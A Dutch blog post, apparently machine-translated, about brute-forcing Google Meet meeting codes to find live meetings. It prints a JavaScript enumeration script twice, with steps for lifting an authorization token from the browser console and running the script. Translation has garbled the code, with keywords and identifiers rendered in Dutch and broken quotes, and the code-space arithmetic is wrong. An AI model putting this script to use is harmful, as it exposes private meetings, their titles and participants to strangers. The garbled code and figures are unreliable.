Visio – Blijf vast in Google Meet | Dyrk, Dyna Meet – Visio

July 30, 2023

Ontmoet Visio

Contents

1 Ontmoet Visio
- 1.1 Pech
- 1.2 Ontmoet Visio

randomize = () => dico = dico.Split (”).Map (value => (< value, sort: Math.random() >)).spell ((a, b) => a.Spell – B.spellen).KAART ((< value >) => waarde).Meedoen (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Split (”).Kaart (c => c == ‘-‘?C: string.van Charcode (wiskunde.Vloer (wiskunde.Willekeurig ()*25) +97)).Meedoen (”),
Key = newpatternkey (), counter = 20;
Next = () => sleutel.Split (”).Kaart (e => e == ‘-‘ ? E: Dico [Dico.IndexOf (e) + 1> = dico.lengte ? 0: Dico.IndexOf (e) + 1]).Meedoen (”),
Teller = 0;
meetLink = ‘https: // meet.Google.com/’, beschikbaar teen = () => xhr = new xmlhttpRequest ();
If (counter ++> = 20) counter = 0;
Key = newpatternkey ();
Randomize ();
>
Sleutel = volgende ();
XHR.Open (‘get’, meetlink + sleutel);
XHR.AddEventLisner (‘load’, (e) => fetch (meetlink.concat (“/$ rpc/google.RTC.vergaderingen.V1.Meetingsspaceservice/resolvemeetingsspace “),” headers “:” autorisatie “: autorisatie,
“Content-Type”: “Application/X-Protobuf”,
“X-GOOG-ADEP-Key”: E.doel.verantwoordelijkheid.Match (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-Za-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-encode-réspose-if-uitvoerbaar”: “base64”,
“X-goog-meeting-identificator”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (sleutel)),
>,
“lichaam”: “\ n \ f”.Concat (key, “0 \ u0001”),
“Methode”: “Post”
>).Dan (e => e.Tekst ())
.vervolgens (e => setTimeout (beschikbaar, 100);
troosten.Log (meetlink.Concat (sleutel).BeautifyDisplay (38), (E.Vervang (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Versturen ();
>;;
Snaar.prototype.BeautifyDisplay = functie (maat) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >maat ? tekst.Lengte: maat)).Substr (0, maat).Concat (‘|’); >,
troosten.Duidelijk ();
beschikbaar ();
>) ()

Pech

Momenteel werk ik op het gebied van cybersecurity, ik word regelmatig geconfronteerd met redelijk triviale situaties.

Laatste, iemands indringing tijdens een vergadering .
Gelukkig bevatte Google Meet voor de veiligheid een functie waarmee zowel deelnemers aan de deelnemers kunnen waarschuwen dat een persoon wil deelnemen aan de videoconferentie, maar ook om het te accepteren of te weigeren.

Dit evenement brengt me echter om mezelf een aantal vragen te stellen .

Complexiteit van de Google Meet Link

Allereerst, hoe is het mogelijk voor een persoon om verbinding te maken met een meet -link zonder er voor te zijn uitgenodigd ?

We moeten rekening houden met de eenvoud van de link: https: // google.ontmoeten.com/Xxx -yyyy -zzzz

Xxx -yyyy -zzzz zijn alleen alfabetische karakters tussen A en Z, dwz 27 mogelijke combinaties voor elk personage.

Voor wiskundigen is er daarom:

27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Mogelijke combinaties .

Levensduur van een Google Meet -link

Hoewel we nu in staat zijn om beter te begrijpen hoe de links van onze “Google Meet” -conferentiebanden worden gebouwd, is er een zeer belangrijk aspect om rekening mee te houden . De levensduur van een Google Meet -link !

Iedereen kan inderdaad Google Meet -vergaderingen genereren in een paar klikken.
Maar na een paar dagen, weken of maanden . De links zijn niet langer geldig.

De gegenereerde links hebben daarom een bepaalde periode van geldigheid .

Uitzondering maken “terugkerende” gebeurtenissen, en dit is waar het interessant wordt.
In het bedrijfsleven zijn er veel mogelijkheden om regelmatig te organiseren (team / zakelijk, dagelijks, wekelijks, maandelijks,, . )).
Wanneer een werknemer dit soort evenement in zijn agenda genereert, wordt automatisch een Google Meet -link gegenereerd. Deze is onveranderlijk.
Dus je hebt elke keer dezelfde link voor dit evenement.

Met een beetje JavaScript en brute kracht ?

Met al deze elementen zijn we nu uitgerust om alle mogelijkheden te vegen en een grote waarschijnlijkheden te bereiken om links naar videoconociates te detecteren !

Dus ik heb een beetje retro-verzekerde de werking van Google Meet om een JavaScript-code te schrijven die een oneindig aantal combinaties zal proberen

(C) DYRK.Org 2023-2024 – Meet’s Roulette
(1) Voer dit script uit op https: // google.ontmoeten.com

(2) Vind en update de variabele van de autorisatie met het token van een geldige autorisatie in de headers “XHR -verzoeken” van uw Googles

Laat autorisatie = “Sapisidhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,

randomize = () => dico = dico.Split (”).Map (value => (< value, sort: Math.random() >)).spell ((a, b) => a.Spell – B.spellen).KAART ((< value >) => waarde).Meedoen (”),
Newpatternkey = () => “xxx-xxxx-xxx”.Split (”).Kaart (c => c == ‘-‘?C: string.van Charcode (wiskunde.Vloer (wiskunde.Willekeurig ()*25) +97)).Meedoen (”),
Key = newpatternkey (), counter = 20;
Next = () => sleutel.Split (”).Kaart (e => e == ‘-‘ ? E: Dico [Dico.IndexOf (e) + 1> = dico.lengte ? 0: Dico.IndexOf (e) + 1]).Meedoen (”),
Teller = 0;
meetLink = ‘https: // meet.Google.com/’, beschikbaar teen = () => xhr = new xmlhttpRequest ();
If (counter ++> = 20) counter = 0;
Key = newpatternkey ();
Randomize ();
>
Sleutel = volgende ();
XHR.Open (‘get’, meetlink + sleutel);
XHR.AddEventLisner (‘load’, (e) => fetch (meetlink.concat (“/$ rpc/google.RTC.vergaderingen.V1.Meetingsspaceservice/resolvemeetingsspace “),” headers “:” autorisatie “: autorisatie,
“Content-Type”: “Application/X-Protobuf”,
“X-GOOG-ADEP-Key”: E.doel.verantwoordelijkheid.Match (/\ [“https \: \/\/meet \.Google \.com \ “\,” ([A-Za-Z0-9 \ _ \-]) “\]/) [1],
“X-goog-authuse”: “0”,
“X-goog-encode-réspose-if-uitvoerbaar”: “base64”,
“X-goog-meeting-identificator”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (sleutel)),
>,
“lichaam”: “\ n \ f”.Concat (key, “0 \ u0001”),
“Methode”: “Post”
>).Dan (e => e.Tekst ())
.Dan (e =>

SetTimeout (beschikbaar, 100);
troosten.Log (meetlink.Concat (sleutel).BeautifyDisplay (38), (E.Vervang (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Versturen ();
>;;
Snaar.prototype.BeautifyDisplay = functie (maat) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >maat ? tekst.Lengte: maat)).Substr (0, maat).Concat (‘|’); >,
troosten.Duidelijk ();
beschikbaar ();
>) ()

Om dit alles te bedienen zal het nodig zijn:

Open de pagina https: // meet.Google.com
Open de ontwikkelaarsconsole
Filter op het tabblad “Netwerk” de fetch / xhr en herstel een token van token“Autorisatie”
Kopieer en plak de broncode hierboven en zet op de plaats aangegeven het token.
Valideer met de toets “Entrance” op uw toetsenbord.

Herstel van “autorisatie” token:

Voor de nieuwsgierige is dit hoe het resultaat van dit script in actie eruit zou moeten zien.
We merken daarom lijnen op die ons informeren dat de ruimte voor videoconferentie niet bestaat.
En anderen die ons het teken van de conferentie hebben opgelegd ! Daarom, wat aangeeft dat de link geldig is;)

Verwacht echter niet dat ze over een paar seconden op een meet link ^^ vallen
(Tenzij je een beetje geluk hebt)
Je moet veel geduld zijn en het minstens een half uur laten lopen.

Conclusie

Raak niet in paniek dat er een groter aantal geluk is om een geldige Google Meet -link te vinden dan het winnen van Loto.

Aandacht ! Een persoon die een geldige ontmoetingslinktoegang tot bepaalde informatie tegenkomt zonder dat u moet worden verbonden:
De naam van de vergadering (vermijd daarom niet -vertrouwelijke informatie uit te glijden) en de verbonden deelnemers (alle of een spel).

Ontmoet Visio

Online overval

Bestseller sticker online diefstal

spelers